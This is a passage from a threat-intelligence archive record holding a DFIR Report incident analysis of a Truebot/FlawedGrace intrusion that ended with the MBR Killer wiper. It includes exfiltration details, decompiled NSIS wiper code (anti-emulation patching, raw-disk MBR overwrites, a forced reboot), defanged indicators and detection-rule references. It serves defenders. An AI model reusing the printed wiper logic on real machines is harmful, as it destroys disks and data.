\"transform-x64\": null,\r\n \"userwx\": true\r\n },\r\n \"dns-beacon\": {\r\n \"dns_idle\": null,\r\n \"dns_sleep\": null,\r\n \"maxdns\": null,\r\n \"beacon\": null,\r\n \"get_A\": null,\r\n \"get_AAAA\": null,\r\n \"get_TXT\": null,\r\n \"put_metadata\": null,\r\n \"put_output\": null\r\n },\r\n \"pipename\": null,\r\n \"smb_frame_header\": \"AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"stage\": {\r\n \"cleanup\": false\r\n },\r\nhttps://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/\r\nPage 26 of 36\n\n\"ssh\": {\r\n \"hostname\": null,\r\n \"port\": null,\r\n \"username\": null,\r\n \"password\": null,\r\n \"privatekey\": null\r\n }\r\n}\r\nExfiltration\r\nOn the second day of the intrusion, a connection from a file server began to the IP 139.60.160[.]166 over port 4433. The\r\nprocess tree indicates the FlawedGrace malware injected into svchost and msiexec on the file server and initiated the\r\ntransfer. Other reports have indicated Truebot/FlawedGrace intrusions have deployed custom tools for exfiltration. We did\r\nnot observe any additional binary dropped to disk to perform the exfiltration. As the FlawedGrace process established the\r\nTCP connection, we assess with moderate confidence the capability was included in the FlawedGrace malware itself.\r\nTwo distinct exfiltration periods were observed taking place around two hours apart.\r\nThe network traffic was not sent over a TLS connection but just the TCP protocol.\r\nThis data was not observable in plain text, indicating likely other obfuscation/encryption methods in use. Using flow data\r\nbetween the two sessions, we were able to verify gigabytes of data were exfiltrated.\r\nhttps://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/\r\nPage 27 of 36\n\nImpact\r\nWithin four hours of the completed exfiltration, merely 29 hours after initial execution, the threat actors started deploying\r\nMBR Killer (aka KillDisk), well-known for its usage during the 2016 Banco de Chile attack. As documented by Flashpoint,\r\nthe wiper is an NSIS (Nullsoft Scriptable Install System) script capable of wiping a device’s MBR (Master Boot Record),\r\nMFT (Master File Table), VBR (Volume Boot Record) and EBR (Extended Boot Record) before forcing a reboot to render a\r\ndevice inoperable. During this destructive stage, the threat actors named the file C:\\ProgramData\\chrome.exe on the\r\nbeachhead, while on other servers the C:\\Windows\\Temp\\[0-9a-f]{32}.exe naming pattern was used.\r\nAs a defense-evasion technique, MBR Killer has been observed using patched NSIS installers relying on non-standard\r\nheaders. Once the payload signature is corrected, NSIS decompilers such as 7zip (9.34 – 15.05) are able to extract the\r\nmalicious NSIS script.\r\nOrigin Hexadecimal Signature\r\nNSIS Specification EF BE AD DE 4E 75 6C 6C 73 6F 66 74 49 6E 73 74\r\nThe DFIR Report’s MBR Killer EF BE AD DE 4E 75 6C 6C 73 6F 66 74 49 90 73 74\r\nBanco de Chile’s MBR Killer EF BE AD DE 4E 75 6C 6C 73 6F 66 74 49 6E 73 85\r\nThis customization provides defenders with a detection opportunity as outlined within the hereafter-provided YARA rules.\r\nDuring initialization, MBR Killer visually hides itself by moving off-screen.\r\nFunction .onGUIInit\r\n System::Call \"User32::SetWindowPos(i, i, i, i, i, i, i) i ($HWNDPARENT, 0, -10000, -10000, 0, 0, 0x0200|0x00\r\nFunctionEnd\r\nOnce hidden, the malicious installer verifies whether it is being emulated by temporarily patching the native Windows\r\nZwClose function (part of ntdll.dll) to immediately succeed with STATUS_SUCCESS before closing a dummy handle\r\nthrough kernel32::CloseHandle(0x12345678) and validating that, although the handle was invalid, the CloseHandle method\r\nsucceeded.\r\nSystem::Call \"kernel32::GetModuleHandle(t) p ('ntdll.dll') .r0\"\r\nIntCmp $0 0 label_exit\r\nSystem::Call \"kernel32::GetProcAddress(p, t) p (r0, 'ZwClose') .r1\"\r\nIntCmp $1 0 label_exit\r\nSystem::Call \"kernel32::VirtualProtect(p, i, i, *i) i (r1, 6, 0x40, .r2) .r0\"\r\nIntCmp $0 0 label_exit\r\nSystem::Alloc 6\r\nPop $3\r\nSystem::Call \"ntdll::memcpy(p, p ,i) i (r3, r1, 6)\"\r\nSystem::Call \"ntdll::memcpy(p, t, i) i (r1, t '1ÀYZÿá', 6)\"\r\nSystem::Call \"kernel32::CloseHandle(i) i (0x12345678) .r4\"\r\nSystem::Call \"ntdll::memcpy(p, p, i) i (r1, r3, 6)\"\r\nIntCmp $4 1 0 label_exit label_exit\r\nIf the anti-analysis check succeeds, the script issues the HideWindow NSIS call, which hides the installer and proceeds to\r\nvalidate the existence of the first physical drive \\\\.\\PHYSICALDRIVE0 by opening it.\r\nhttps://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/\r\nPage 28 of 36\n\nFunction func_open_physicaldrive\r\n IntFmt $1 \\\\.\\PHYSICALDRIVE%d $0\r\n Push $0\r\n StrCpy $0 $1\r\n System::Call \"Kernel32::CreateFile(t, i, i, i, i, i, i) i ('$0', 0x80000000|0x40000000, 0x1|0x2, 0, 3, 0x80\r\n Pop $0\r\nFunctionEnd\r\nOnce the first \\\\.\\PHYSICALDRIVE0 drive opened, MBR Killer conditionally attempts to wipe:\r\nMFT (Master File Table) contains metadata about files and directories, such as names, dates and sizes.\r\nVBR (Volume Boot Record) contains, amongst others, code required to bootstrap the operating system.\r\nEBR (Extended Boot Record) contains information to describe logical partitions.\r\nMBR Killer then proceeds to wipe the MBR (Master Boot Record) three times by writing 512 empty bytes at offset 0 and\r\nattempts to repeat the wiping on the next available disk (\\\\.\\PHYSICALDRIVE1, \\\\.\\PHYSICALDRIVE2, …).\r\nlabel_check_physicaldrive:\r\n Call func_open_physicaldrive\r\n IntCmp $2 -1 label_goto_exit\r\n System::Call \"kernel32::SetFilePointer(i, i ,i ,i) i (r2, 0, 0, 0) .r3\"\r\n IntCmp $3 -1 label_close_physicaldrive\r\n System::Alloc 4\r\n Pop $3\r\n System::Call \"kernel32::ReadFile(i, i, i, p, i) i (r2, r9, 512, r3, 0) .r4\"\r\n System::Free $3\r\n IntCmp $4 1 0 label_close_physicaldrive label_close_physicaldrive\r\n Push $0\r\n Push $2\r\n Push $9\r\n Push $2\r\n Push $9\r\n Call func_wipe_mft_vbr__ebr\r\n Pop $9\r\n Pop $2\r\n Pop $0\r\n System::Alloc 512\r\n Pop $5\r\n System::Alloc 4\r\n Pop $6\r\n StrCpy $7 1\r\n Goto label_wipe\r\nlabel_next_wipe:\r\n IntOp $7 $7 + 1\r\nlabel_wipe:\r\n IntCmp $7 3 0 0 label_free_wipe\r\n System::Call \"kernel32::SetFilePointer(i, i ,i ,i) i (r2, 0, 0, 0) .r3\"\r\n IntCmp $3 -1 label_goto_next_wipe\r\n System::Call \"kernel32::WriteFile(i, i, i, p, i) i (r2, r5, 512, r6, 0)\"\r\n System::Call \"kernel32::FlushFileBuffers(i) i (r2)\"\r\nlabel_goto_next_wipe:\r\n Goto label_next_wipe\r\nlabel_free_wipe:\r\nhttps://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/\r\nPage 29 of 36\n\nSystem::Free $6\r\n System::Free $5\r\nlabel_close_physicaldrive:\r\n System::Call \"kernel32::CloseHandle(i) i (r2)\"\r\n Goto label_next_physicaldrive\r\nlabel_goto_exit:\r\n Goto label_exit\r\nlabel_next_physicaldrive:\r\n IntOp $0 $0 + 1\r\n Goto label_check_physicaldrive\r\nOnce the MBR Killer wiper has done its damage, the script attempts to modify its process privileges to enable the\r\nSeShutdownPrivilege and initiates a reboot.\r\nlabel_exit:\r\n StrCpy $1 0\r\n System::Call \"advapi32::OpenProcessToken(i, i, *i) i (-1, 0x0008|0x0020, .r1) i .r0\"\r\n StrCmp $0 0 label_shutdown\r\n System::Call \"advapi32::LookupPrivilegeValue(t, t, *l) i (n, 'SeShutdownPrivilege', .r2r2) i .r0\"\r\n StrCmp $0 0 label_close_process\r\n System::Call \"*(i 1, l r2, i 0x00000002) i .r0\"\r\n System::Call \"advapi32::AdjustTokenPrivileges(i, i, i, i, i, i) i (r1, 0, r0, 0, 0, 0)\"\r\n System::Free $0\r\nlabel_close_process:\r\n System::Call \"kernel32::CloseHandle(i) i (r1)\"\r\nlabel_shutdown:\r\n Call func_shutdown\r\nTo initiate the reboot, MBR Killer calls ExitWindowsEx with:\r\nEWX_REBOOT (0x2) to cause a reboot\r\nEWX_FORCE (0x4) to try to force the operation\r\nSHTDN_REASON_MAJOR_SOFTWARE (0x00030000) to indicate it was software-caused\r\nSHTDN_REASON_MINOR_UPGRADE (0x00000003) to indicate the software reason is an upgrade.\r\nFunction func_shutdown\r\n Push $1\r\n StrCpy $1 0x2|0x4\r\n System::Call \"user32::ExitWindowsEx(i, i) i ($1, 0x00030000|0x00000003) i .r0\"\r\n Pop $1\r\nFunctionEnd\r\nWorth noting is that even-though the MBR Killer script attempts a reboot, the same functionality is implemented within the\r\nNSIS installer itself. Upon reboot, the affected machines were rendered inoperable.\r\nhttps://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/\r\nPage 30 of 36\n\nWhile the wiper we observed was not packed using VM-Protect, the decompiled script is near-similar to the 2016 Banco de\r\nChile wiper component and indicates the source-code was likely shared.\r\nSupporting this theory was the change in NSIS version from v3.0b2 (Released on August 4th, 2015) to v3.04 (Released on\r\nDecember 15th, 2018) alongside the removal of the MBR Killer branding.\r\n-Name \"MBR Killer\"\r\n-BrandingText \"Nullsoft Install System v3.0b2\"\r\n+Name Name\r\n+BrandingText \"Nullsoft Install System v3.04\"\r\nWhile the 2016 sample was bzip2-compressed, the recompiled version now uses the more performant zlib compression.\r\n-SetCompressor /SOLID bzip2\r\n+SetCompressor zlib\r\nFunctionality-wise, our newly observed wiper performs a justified reboot (0x2, EWX_REBOOT) whereas the Banco de\r\nChile variant merely performed an unjustified shut-down (0x8, EWX_POWEROFF).\r\n- StrCpy $1 0x8|0x4\r\n- System::Call \"user32::ExitWindowsEx(i, i) i ($1, 0) i .r0\"\r\n+ StrCpy $1 0x2|0x4\r\n+ System::Call \"user32::ExitWindowsEx(i, i) i ($1, 0x00030000|0x00000003) i .r0\"\r\nAs a hunting opportunity, we observed NSIS executables (legitimate or not) automatically drop the %Temp%\\ns[a-zA-Z0-9]\r\n{5}.tmp\\System.dll library as part of the legitimate NSIS System plugin, giving developers the ability to call any exported\r\nfunction from any DLL. While not indicative of malicious activity, we recommend threat hunters review the creation of the\r\nabove library to identify potentially undesirable installers within their environment.\r\nTimeline\r\nhttps://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/\r\nPage 31 of 36\n\nDiamond Model\r\nIndicators\r\nhttps://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/\r\nPage 32 of 36\n\nAtomic\r\n# Truebot\r\nessadonio[.]com / 45.182.189[.]71\r\n# Cobalt Strike\r\n5.188.206[.]78\r\n# FlawedGrace\r\n5.188.86[.]18\r\n81.19.135[.]30\r\n92.118.36[.]199\r\n# Exfiltration IP Address\r\n139.60.160[.]166\r\nComputed\r\n# Truebot\r\nName: Document_may_24_16654.exe\r\nSize: 10435552 bytes\r\nMD5: 6164e9d297d29aa8682971259da06848\r\nSHA1: 96b95edc1a917912a3181d5105fd5bfad1344de0\r\nSHA256: 717beedcd2431785a0f59d194e47970e9544fbf398d462a305f6ad9a1b1100cb\r\n# Truebot C2\r\nIP: 45.182.189[.]71\r\nJARM: 28d28d28d00028d00042d42d0000005a3e96c1dfa4bdb24b8b3c04cae18cc3\r\n# AdFind\r\nName: AdFind.exe\r\nSize: 1619968 bytes\r\nMD5: 12011c44955fd6631113f68a99447515\r\nSHA1: 4f4f8cf0f9b47d0ad95d159201fe7e72fbc8448d\r\nSHA256: c92c158d7c37fea795114fa6491fe5f145ad2f8c08776b18ae79db811e8e36a3\r\n# MBR Killer\r\nName: chrome.exe\r\nSize: 46698\r\nMD5: 2dc57a3836e4393d4d16c4eb04bf9c7e\r\nSHA1: c6a5b345cef4eb795866ba81dcac9bd933fdd86d\r\nSHA256: 121a1f64fff22c4bfcef3f11a23956ed403cdeb9bdb803f9c42763087bd6d94e\r\n# Legitimate NSIS System plugin\r\nName: System.dll\r\nMD5: fbe295e5a1acfbd0a6271898f885fe6a\r\nSHA1: d6d205922e61635472efb13c2bb92c9ac6cb96da\r\nSHA256: a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1\r\nDetections\r\nNetwork\r\nhttps://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/\r\nPage 33 of 36\n\nhttps://github.com/The-DFIR-Report/Suricata-Rules/blob/main/rules/truebot.rules\r\nETPRO MALWARE FlawedGrace CnC Activity M1\r\nETPRO MALWARE FlawedGrace CnC Activity M2\r\nET DROP Dshield Block Listed Source group 1\r\nET HUNTING Suspicious Empty SSL Certificate - Observed in Cobalt Strike\r\nET MALWARE Meterpreter or Other Reverse Shell SSL Cert\r\nThreatFox Cobalt Strike botnet C2 traffic (ip:port - confidence level: 100%)\r\nThreatFox Silence botnet C2 traffic (ip:port - confidence level: 75%)\r\nET POLICY Tunneled RDP msts Handshake\r\nET POLICY SMB2 NT Create AndX Request For an Executable File\r\nET POLICY SMB Executable File Transfer\r\nET RPC DCERPC SVCCTL - Remote Service Control Manager Access\r\nSigma\r\nDFIR Report Repository\r\nNullsoft Scriptable Installer Script (NSIS) execution: b95288d8-020a-4df0-95cb-d2d3a806ab11\r\nNullsoft Scriptable Installer Script (NSIS) execution: 221f15de-1cce-40b2-a766-2873938198c6\r\nViewing remote directories: bca1fab7-5640-489d-a161-e154fb6ba4f8\r\nList remote processes using tasklist: 80a56507-6778-4d04-8346-320a70358f2c\r\nFlawedGrace spawning threat injection target: 295e71e5-38c9-4a59-90dd-9fa7bf617b4b\r\nAdFind Discovery: 50046619-1037-49d7-91aa-54fc92923604\r\nSigma Repository\r\nCobaltStrike Named Pipe: d5601f8c-b26f-4ab0-9035-69e11a8d4ad2\r\nCobaltStrike Service Installations – Security: d7a95147-145f-4678-b85d-d1ff4a3bb3f6\r\nSuspicious Group And Account Reconnaissance Activity Using Net.EXE: d95de845-b83c-4a9a-8a6a-4fc802ebf6c0\r\nNet.exe Execution: 183e7ea8-ac4b-4c23-9aec-b3dac4e401ac\r\nNew Process Created Via Wmic.EXE: 526be59f-a573-4eea-b5f7-f0973207634d\r\nSuspicious Scheduled Task Creation: 3a734d25-df5c-4b99-8034-af1ddb5883a4\r\nNew User Created Via Net.EXE: cd219ff3-fa99-45d4-8380-a7d15116c6dc\r\nYara\r\nhttps://github.com/The-DFIR-Report/Yara-Rules/blob/main/21619/21619.yar\r\nMITRE\r\nhttps://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/\r\nPage 34 of 36\n\nProcess Injection - T1055\r\nDisk Structure Wipe - T1561.002\r\nExfiltration Over Alternative Protocol - T1048\r\nMatch Legitimate Name or Location - T1036.005\r\nDisable or Modify Tools - T1562.001\r\nDeobfuscate/Decode Files or Information - T1140\r\nFileless Storage - T1027.011\r\nCommand Obfuscation - T1027.010\r\nScheduled Task - T1053.005\r\nPowerShell - T1059.001\r\nMalicious File - T1204.002\r\nWeb Protocols - T1071.001\r\nCustom Command and Control Protocol - T1094\r\nSystem Owner/User Discovery - T1033\r\nhttps://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/\r\nPage 35 of 36\n\nDomain Groups - T1069.002\r\nLocal Groups - T1069.001\r\nDomain Trust Discovery - T1482\r\nProcess Discovery - T1057\r\nDomain Account - T1087.002\r\nFile and Directory Discovery - T1083\r\nRemote System Discovery - T1018\r\nSecurity Software Discovery - T1518.001\r\nQuery Registry - T1012\r\nSMB/Windows Admin Shares - T1021.002\r\nLocal Data Staging - T1074.001\r\nLSASS Memory - T1003.001\r\nPass the Hash - T1550.002\r\nValid Accounts - T1078\r\nCreate or Modify System Process: Windows Service - T1543.003\r\nOS Credential Dumping: Security Account Manager - T1003.002\r\nSpearphishing Link - T1566.002\r\nInternal case #21619\r\nSource: https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/\r\nhttps://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/\r\nPage 36 of 36\n\n https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/ \nScheduled tasks were used by the threat actors to run much of their malware as SYSTEM. The initial execution tasks for\nFlawedGrace used the \\2 registered task were created to run under SYSTEM as seen by the Author in the task details.\n Page 13 of 36", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE", "Malpedia" ], "origins": [ "web" ], "references": [ "https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/" ], "report_names": [ "a-truly-graceful-wipe-out" ], "threat_actors": [ { "id": "42a6a29d-6b98-4fd6-a742-a45a0306c7b0", "created_at": "2022-10-25T15:50:23.710403Z", "updated_at": "2026-04-10T02:00:05.281246Z", "deleted_at": null, "main_name": "Silence", "aliases": [ "Whisper Spider" ], "source_name": "MITRE:Silence", "tools": [ "Winexe", "SDelete" ], "source_id": "MITRE", "reports": null }, { "id": "c61fb5f8-fcd6-43e8-8b2d-4e81541589f7", "created_at": "2023-11-14T02:00:07.071699Z", "updated_at": "2026-04-10T02:00:03.440831Z", "deleted_at": null, "main_name": "DEV-0950", "aliases": [ "Lace Tempest" ], "source_name": "MISPGALAXY:DEV-0950", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "610a7295-3139-4f34-8cec-b3da40add480", "created_at": "2023-01-06T13:46:38.608142Z", "updated_at": "2026-04-10T02:00:03.03764Z", "deleted_at": null, "main_name": "Cobalt", "aliases": [ "Cobalt Group", "Cobalt Gang", "GOLD KINGSWOOD", "COBALT SPIDER", "G0080", "Mule Libra" ], "source_name": "MISPGALAXY:Cobalt", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "6728f306-6259-4e7d-a4ea-59586d90a47d", "created_at": "2023-01-06T13:46:39.175292Z", "updated_at": "2026-04-10T02:00:03.236282Z", "deleted_at": null, "main_name": "FIN11", "aliases": [ "TEMP.Warlock", "UNC902" ], "source_name": "MISPGALAXY:FIN11", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e8ebcbda-e8df-4a38-a2a6-63b2608ee6f3", "created_at": "2023-01-06T13:46:38.88051Z", "updated_at": "2026-04-10T02:00:03.131218Z", "deleted_at": null, "main_name": "Silence group", "aliases": [ "WHISPER SPIDER" ], "source_name": "MISPGALAXY:Silence group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "5e6b31a6-80e3-4e7d-8b0a-d94897ce9b59", "created_at": "2024-06-19T02:03:08.128175Z", "updated_at": "2026-04-10T02:00:03.636663Z", "deleted_at": null, "main_name": "GOLD TAHOE", "aliases": [ "Cl0P Group Identity", "FIN11 ", "GRACEFUL SPIDER ", "SectorJ04 ", "Spandex Tempest ", "TA505 " ], "source_name": "Secureworks:GOLD TAHOE", "tools": [ "Clop", "Cobalt Strike", "FlawedAmmy", "Get2", "GraceWire", "Malichus", "SDBbot", "ServHelper", "TrueBot" ], "source_id": "Secureworks", "reports": null }, { "id": "75d4d6a9-b5d1-4087-a7a0-e4a9587c45f4", "created_at": "2022-10-25T15:50:23.5188Z", "updated_at": "2026-04-10T02:00:05.26565Z", "deleted_at": null, "main_name": "TA505", "aliases": [ "TA505", "Hive0065", "Spandex Tempest", "CHIMBORAZO" ], "source_name": "MITRE:TA505", "tools": [ "AdFind", "Azorult", "FlawedAmmyy", "Mimikatz", "Dridex", "TrickBot", "Get2", "FlawedGrace", "Cobalt Strike", "ServHelper", "Amadey", "SDBbot", "PowerSploit" ], "source_id": "MITRE", "reports": null }, { "id": "1db21349-11d6-4e57-805c-fb1e23a8acab", "created_at": "2022-10-25T16:07:23.630365Z", "updated_at": "2026-04-10T02:00:04.694622Z", "deleted_at": null, "main_name": "FIN11", "aliases": [ "Chubby Scorpius", "DEV-0950", "Lace Tempest", "Operation Cyclone" ], "source_name": "ETDA:FIN11", "tools": [ "AZORult", "Amadey", "AmmyyRAT", "AndroMut", "BLUESTEAL", "Cl0p", "EMASTEAL", "FLOWERPIPE", "FORKBEARD", "FRIENDSPEAK", "FlawedAmmyy", "GazGolder", "Get2", "GetandGo", "JESTBOT", "MINEBRIDGE", "MINEBRIDGE RAT", "MINEDOOR", "MIXLABEL", "Meterpreter", "NAILGUN", "POPFLASH", "PuffStealer", "Rultazo", "SALTLICK", "SCRAPMINT", "SHORTBENCH", "SLOWROLL", "SPOONBEARD", "TiniMet", "TinyMet", "VIDAR", "Vidar Stealer" ], "source_id": "ETDA", "reports": null }, { "id": "eb5915d6-49a0-464d-9e4e-e1e2d3d31bc7", "created_at": "2025-03-29T02:05:20.764715Z", "updated_at": "2026-04-10T02:00:03.851829Z", "deleted_at": null, "main_name": "GOLD WYMAN", "aliases": [ "Silence " ], "source_name": "Secureworks:GOLD WYMAN", "tools": [ "Silence" ], "source_id": "Secureworks", "reports": null }, { "id": "88e53203-891a-46f8-9ced-81d874a271c4", "created_at": "2022-10-25T16:07:24.191982Z", "updated_at": "2026-04-10T02:00:04.895327Z", "deleted_at": null, "main_name": "Silence", "aliases": [ "ATK 86", "Contract Crew", "G0091", "TAG-CR8", "TEMP.TruthTeller", "Whisper Spider" ], "source_name": "ETDA:Silence", "tools": [ "EDA", "EmpireDNSAgent", "Farse", "Ivoke", "Kikothac", "LOLBAS", "LOLBins", "Living off the Land", "Meterpreter", "ProxyBot", "ReconModule", "Silence.Downloader", "TiniMet", "TinyMet", "TrueBot", "xfs-disp.exe" ], "source_id": "ETDA", "reports": null }, { "id": "99cb4e5b-8071-4f9e-aa1d-45bfbb6197e3", "created_at": "2023-01-06T13:46:38.860754Z", "updated_at": "2026-04-10T02:00:03.125179Z", "deleted_at": null, "main_name": "TA505", "aliases": [ "SectorJ04", "SectorJ04 Group", "ATK103", "GRACEFUL SPIDER", "GOLD TAHOE", "Dudear", "G0092", "Hive0065", "CHIMBORAZO", "Spandex Tempest" ], "source_name": "MISPGALAXY:TA505", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e447d393-c259-46e2-9932-19be2ba67149", "created_at": "2022-10-25T16:07:24.28282Z", "updated_at": "2026-04-10T02:00:04.921616Z", "deleted_at": null, "main_name": "TA505", "aliases": [ "ATK 103", "Chimborazo", "G0092", "Gold Evergreen", "Gold Tahoe", "Graceful Spider", "Hive0065", "Operation Tovar", "Operation Trident Breach", "SectorJ04", "Spandex Tempest", "TA505", "TEMP.Warlock" ], "source_name": "ETDA:TA505", "tools": [ "Amadey", "AmmyyRAT", "AndroMut", "Azer", "Bart", "Bugat v5", "CryptFile2", "CryptoLocker", "CryptoMix", "CryptoShield", "Dridex", "Dudear", "EmailStealer", "FRIENDSPEAK", "Fake Globe", "Fareit", "FlawedAmmyy", "FlawedGrace", "FlowerPippi", "GOZ", "GameOver Zeus", "GazGolder", "Gelup", "Get2", "GetandGo", "GlobeImposter", "Gorhax", "GraceWire", "Gussdoor", "Jaff", "Kasidet", "Kegotip", "Kneber", "LOLBAS", "LOLBins", "Living off the Land", "Locky", "MINEBRIDGE", "MINEBRIDGE RAT", "MirrorBlast", "Neutrino Bot", "Neutrino Exploit Kit", "P2P Zeus", "Peer-to-Peer Zeus", "Philadelphia", "Philadephia Ransom", "Pony Loader", "Rakhni", "ReflectiveGnome", "Remote Manipulator System", "RockLoader", "RuRAT", "SDBbot", "ServHelper", "Shifu", "Siplog", "TeslaGun", "TiniMet", "TinyMet", "Trojan.Zbot", "Wsnpoem", "Zbot", "Zeta", "ZeuS", "Zeus" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434130, "ts_updated_at": 1775826694, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/64df87cac686a9d3f82ec3e06e6364718b9afeb1.pdf", "text": "https://archive.orkl.eu/64df87cac686a9d3f82ec3e06e6364718b9afeb1.txt", "img": "https://archive.orkl.eu/64df87cac686a9d3f82ec3e06e6364718b9afeb1.jpg" } }